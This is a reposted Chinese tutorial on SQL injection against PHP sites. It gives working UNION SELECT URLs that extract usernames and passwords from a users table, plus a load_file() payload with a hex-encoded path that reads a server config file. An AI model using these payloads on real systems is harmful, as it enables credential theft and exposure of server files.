php注入3

來源:互聯網
上載者:User

三:一些注入技巧,很多都是個人發現哦
1.union select的技巧
UNION 用於將多個 SELECT 語句的結果聯合到一個結果集中。在 SELECT 中的 select_expression 部分列出的列必須具有同樣的類型。第一個 SELECT 查詢中使用的列名將作為結果集的列名返回。
然而有我們可以用下面的方法來猜測列的類型,可是省去很多時間
我們先
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
圖24

看看軟體描述裡寫著3,作者裡寫著4,我們就可以猜測3和4的位置是字元型的,我們再看14前面的是下載次數,這就應該是int型的了,對吧。
好了,我們根據這裡來構建吧,估計username和password也是字元型的。
試試看哦
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
如圖25

哈哈,這種方法只要看看就可以大概猜到了。
2.load_file讀寫檔案的技巧
不知道你有沒有發現過在我們用load_file()讀寫php檔案時不能在網頁中顯示。例如:
C:/apache/htdocs/site/lib/sql.inc.php 轉化為16進位為:0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
我們構造如下
http://localhost/site/display.php?id=

451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)
,4,5,6,7,8,9,10,11
如圖26

發現在文章內容的地方本來該顯示sql.inc.php的,可是卻空空之,為何呢?
我們看看網頁的原始碼先
圖27

哈哈,看看標記的地方,暈死,原來在這裡啊,可是為什麼哩?
原來html中< >用於標註,哈哈,明白了吧!下次可得記得在哪裡找哦。



相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.